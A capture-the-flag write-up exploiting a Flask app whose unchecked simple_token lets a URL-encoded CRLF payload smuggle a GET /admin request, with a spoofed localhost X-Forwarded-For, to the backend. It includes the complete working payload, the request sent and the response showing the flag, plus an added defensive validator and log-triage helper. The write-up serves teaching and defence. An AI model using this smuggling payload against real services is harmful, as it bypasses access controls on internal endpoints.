My app is faulty, can you get the flag?? https://smug.flag4all.sh Flag format: flag{xxx}
app/app.py

from flask import request, abort, g, render_template

# app (the Flask instance), curl_back() and DELETE are defined elsewhere in
# app.py; curl_back() forwards the request to the backend and passes the
# token along as the Simple-Token header.

@app.route('/delete', methods=['POST'])
def post_delete():
    post_idx = request.form.get('post_idx')
    print(post_idx)
    # post_idx is validated (decimal digits only) ...
    if not isinstance(post_idx, str) or not post_idx.isdecimal():
        abort(400)
    # ... but g.simple_token goes into the backend request unchanged
    res = curl_back(f'/posts/{post_idx}', DELETE, request.remote_addr, g.simple_token)
    if res is None:
        abort(400)
    # the raw backend response is rendered into the page as-is
    return render_template('/api_result.html', simple_token=g.simple_token, res=res)
Since /delete doesn't beautify the response, we can use it to perform our HTTP request smuggling: the backend's raw reply is rendered into api_result.html unchanged, so whatever a smuggled request returns is shown to us. The token is never checked for CR/LF before it is placed in the Simple-Token header, so a URL-encoded %0D%0A inside simple_token terminates that header and lets us append our own headers and a second request.
We create a token and smuggle a second request to the backend /admin endpoint to fetch the flag with this payload:
/delete?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AContent-Length:%202%0d%0a%0d%0a2a%0d%0a%0d%0aGET%20/admin%20HTTP/1.1%0D%0AHost:%20127.0.0.1:8000%0D%0ASimple-Token:%20b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/%20HTTP/1.1
Once it is passed to the curl_back() function, the injected CRLFs split the simple_token header and the backend sees these requests (each %0D%0A%0D%0A becomes a blank line, ending the headers of the request before it):

/delete?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763
Content-Length: 2

2a

GET /admin HTTP/1.1
Host: 127.0.0.1:8000
Simple-Token: b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763
X-Forwarded-For: 127.0.0.1
Content-Length: 0

GET / HTTP/1.1
...
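The root cause above is a user-controlled value copied into a request header without rejecting CR/LF. The following is an added example, not the challenge's code or anything from the write-up: it shows the allow-list check the app should have applied to simple_token before calling anything like curl_back(), a generic header-value check, and a small log-triage helper that URL-decodes a query value and lists the request-lines a backend would see if that value were pasted into a header. The function names, the 64-hex-character token format (the write-up's token has that shape) and the shortened sample payload are assumptions made for this example.

```python
"""Reject CRLF injection in a value that will be copied into an HTTP header.

Added example for this write-up; it is not the challenge's code.  It models
the bug described above: a user-supplied simple_token is copied by a helper
like curl_back() into the Simple-Token header of the backend request, and a
URL-encoded %0D%0A in the token terminates that header and lets the caller
append more headers and whole extra requests.  The function names, the
64-hex-char token format and the sample values are assumptions made here.
"""
import re
from urllib.parse import unquote

# Assumption: tokens issued by the app are 64 lowercase hex characters
# (the one in the write-up is).  An allow-list like this is the simplest
# fix, because CR, LF, ':' and spaces can never match it.
TOKEN_RE = re.compile(r"[0-9a-f]{64}")

# Generic rule for header values that are less structured: RFC 9110 field
# values must not contain CR, LF or NUL.  A bare CR/LF is exactly what turns
# one header into "header + injected lines".
FORBIDDEN_IN_HEADER = ("\r", "\n", "\0")

# METHOD SP request-target SP HTTP-version, as a backend parser would see it.
REQUEST_LINE_RE = re.compile(
    r"(?:GET|HEAD|POST|PUT|DELETE|PATCH|OPTIONS) \S+ HTTP/\d\.\d"
)


def is_valid_token(token: str) -> bool:
    """Allow-list check: True only for a 64-char lowercase hex token."""
    return TOKEN_RE.fullmatch(token) is not None


def has_header_injection(value: str) -> bool:
    """True if the value contains a character that is illegal in a header."""
    return any(c in value for c in FORBIDDEN_IN_HEADER)


def header_value_or_reject(token: str) -> str:
    """Return the token if it is safe to place in a header, else raise.

    Call this before handing the token to anything that builds a request;
    that is the point where the challenge app should have failed closed.
    """
    if not is_valid_token(token):
        raise ValueError("simple_token rejected: not a 64-char hex string")
    return token


def smuggled_request_lines(raw_query_value: str) -> list[str]:
    """Triage helper for access logs.

    URL-decode a query-string value and return every embedded HTTP
    request-line that a backend would see if the value were copied into a
    header unescaped.  A non-empty result is a strong signal of an injection
    attempt; two lines means two extra requests, as in the write-up's payload.
    """
    decoded = unquote(raw_query_value)
    # Split on CRLF or bare LF; the injected %0D%0A decodes to exactly this.
    lines = re.split(r"\r?\n", decoded)
    return [ln for ln in lines if REQUEST_LINE_RE.fullmatch(ln)]


# Constructed sample modelled on the write-up's payload, shortened: the token
# and paths are placeholders, not the challenge's real values.
SAMPLE_QUERY_VALUE = (
    "0123abcd%0D%0AContent-Length:%200%0d%0a%0d%0a"
    "GET%20/admin%20HTTP/1.1%0D%0AHost:%20127.0.0.1:8000%0d%0a%0d%0a"
    "GET%20/%20HTTP/1.1"
)


if __name__ == "__main__":
    print(smuggled_request_lines(SAMPLE_QUERY_VALUE))
    print(has_header_injection(unquote(SAMPLE_QUERY_VALUE)))
    try:
        header_value_or_reject(unquote(SAMPLE_QUERY_VALUE))
    except ValueError as exc:
        print("rejected:", exc)
```

The allow-list is the real fix here: with it, the token can only ever be hex and the question of escaping never arises. The generic CR/LF check is a second line of defence for values that cannot be allow-listed, and it is also what a well-behaved HTTP client library enforces on its own (Python's http.client, for instance, raises ValueError on a header value containing a bare CR or LF), which is one more reason not to build backend requests by string concatenation.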
When we send the payload to the challenge, the flag appears in the rendered backend response:
POST /delete?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AContent-Length:%202%0d%0a%0d%0a2a%0d%0a%0d%0aGET%20/admin%20HTTP/1.1%0D%0AHost:%20127.0.0.1:8000%0D%0ASimple-Token:%20b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aContent-Length:%200%0d%0a%0d%0aGET%20/%20HTTP/1.1 HTTP/1.1
Host: smug.flag4all.sh
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
post_idx=0

The response, with the backend's raw output (and the flag) rendered inside the <pre> block:
HTTP/1.1 200
content-type: text/html; charset=utf-8
date: Sat, 21 Oct 2023 15:54:28 GMT
server: Werkzeug/3.0.0 Python/3.11.6
content-length: 943
alt-svc: h3=":443";ma=900;
set-cookie: C00ki3_st1cks=srv_8e3764354bd1f2bc478366221e074e9125382782e4de6fdc445883887a99a536; path=/
connection: close
<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="/static/css/normalize.css">
</head>
<body>
<h2>Result</h2>
<pre>
nullHTTP/1.1 200 OK
date: Sat, 21 Oct 2023 15:54:27 GMT
server: uvicorn
content-length: 54
content-type: application/json
{"message":"flag{7847560c748814fd3070e9149a9578bd}\n"}HTTP/1.1 401 Unauthorized
date: Sat, 21 Oct 2023 15:54:27 GMT
server: uvicorn
content-length: 4
content-type: application/json
null
</pre><br>
<a href="/menu?simple_token=b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AContent-Length:+2%0D%0A%0D%0A2a%0D%0A%0D%0AGET+/admin+HTTP/1.1%0D%0AHost:+127.0.0.1:8000%0D%0ASimple-Token:+b3a0608ca1966b6ed4d3409c90f98102194e232619bc4a935e0608959b7d0763%0D%0AX-Forwarded-For:+127.0.0.1%0D%0AContent-Length:+0%0D%0A%0D%0AGET+/+HTTP/1.1"><button id="cancel" type="submit" form="cancel_button">Go back</button></a>
</body>
</html>